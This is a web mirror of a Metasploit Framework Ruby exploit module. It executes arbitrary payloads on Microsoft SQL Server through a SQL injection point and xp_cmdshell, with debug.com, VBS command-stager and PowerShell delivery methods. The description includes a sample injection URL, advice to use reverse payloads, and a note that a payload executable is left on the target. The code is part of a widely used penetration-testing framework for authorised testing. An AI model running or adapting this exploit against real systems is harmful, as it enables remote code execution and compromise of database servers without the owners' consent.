Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/mssql/mssql_payload_sqli.rb
19566 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::MSSQL_SQLI

10
  include Msf::Exploit::CmdStager

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Microsoft SQL Server Payload Execution via SQL Injection',

17
        'Description' => %q{

18
          This module will execute an arbitrary payload on a Microsoft SQL

19
          Server, using a SQL injection vulnerability.

20


21
          Once a vulnerability is identified this module

22
          will use xp_cmdshell to upload and execute Metasploit payloads.

23
          It is necessary to specify the exact point where the SQL injection

24
          vulnerability happens. For example, given the following injection:

25


26
          http://www.example.com/show.asp?id=1;exec xp_cmdshell 'dir';--&cat=electrical

27


28
          you would need to set the following path:

29
          set GET_PATH /showproduct.asp?id=1;[SQLi];--&cat=foobar

30


31
          In regard to the payload, unless there is a closed port in the web server,

32
          you dont want to use any "bind" payload, specially on port 80, as you will

33
          stop reaching the vulnerable web server host. You want a "reverse" payload, probably to

34
          your port 80 or to any other outbound port allowed on the firewall.

35
          For privileged ports execute Metasploit msfconsole as root.

36


37
          Currently, three delivery methods are supported.

38


39
          First, the original method uses Windows 'debug.com'. File size restrictions are

40
          avoided by incorporating the debug bypass method presented by SecureStat at

41
          Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems.

42


43
          A second method takes advantage of the Command Stager subsystem. This allows using

44
          various techniques, such as using a TFTP server, to send the executable. By default

45
          the Command Stager uses 'wcsript.exe' to generate the executable on the target.

46


47
          Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the

48
          payload on the target.

49


50
          NOTE: This module will leave a payload executable on the target system when the

51
          attack is finished.

52
        },

53
        'Author' => [

54
          'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>', # original module, debug.exe method, powershell method

55
          'jduck', # command stager mods

56
          'Rodrigo Marcos' # SQL injection mods

57
        ],

58
        'License' => MSF_LICENSE,

59
        'References' => [

60
          # 'sa' password in logs

61
          [ 'CVE', '2000-0402' ],

62
          [ 'OSVDB', '557' ],

63
          [ 'BID', '1281' ],

64


65
          # blank default 'sa' password

66
          [ 'CVE', '2000-1209' ],

67
          [ 'OSVDB', '15757' ],

68
          [ 'BID', '4797' ],

69


70
          # code and comments

71
          [ 'URL', 'http://www.secforce.co.uk/blog/2011/01/penetration-testing-sql-injection-and-metasploit/' ]

72


73
        ],

74
        'Platform' => 'win',

75
        'Arch' => [ ARCH_X86, ARCH_X64 ],

76
        'Payload' => {

77
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\%",

78
        },

79
        'Targets' => [

80
          [ 'Automatic', {} ],

81
        ],

82
        'CmdStagerFlavor' => 'vbs',

83
        'DefaultTarget' => 0,

84
        'DisclosureDate' => '2000-05-30',

85
        'Notes' => {

86
          'Reliability' => UNKNOWN_RELIABILITY,

87
          'Stability' => UNKNOWN_STABILITY,

88
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

89
        }

90
      )

91
    )

92
    register_options(

93
      [

94
        OptEnum.new('DELIVERY', [true, 'Payload delivery method', 'OLD', ['PS', 'CMD', 'OLD']])

95
      ]

96
    )

97
  end

98


99
  # This is method required for the CmdStager to work...

100
  def execute_command(cmd, opts)

101
    mssql_xpcmdshell(cmd, datastore['VERBOSE'])

102
  end

103


104
  def exploit

105
    method = datastore['DELIVERY'].downcase

106


107
    if (method =~ /^cmd/)

108
      execute_cmdstager({ :linemax => 1500, :nodelete => true })

109
      # execute_cmdstager({ :linemax => 1500 })

110
    else

111
      # Generate the EXE, this is the same no matter what delivery mechanism we use

112
      exe = generate_payload_exe

113


114
      # Use powershell method for payload delivery if specified

115
      if (method =~ /^ps/) or (method =~ /^power/)

116
        powershell_upload_exec(exe)

117
      else

118
        # Otherwise, fall back to the old way..

119
        mssql_upload_exec(exe, datastore['VERBOSE'])

120
      end

121
    end

122
    print_status("Almost there, the stager takes a while to execute. Waiting 50 seconds...")

123
    select(nil, nil, nil, 50)

124
    handler

125
    disconnect

126
  end

127


128
end

129


130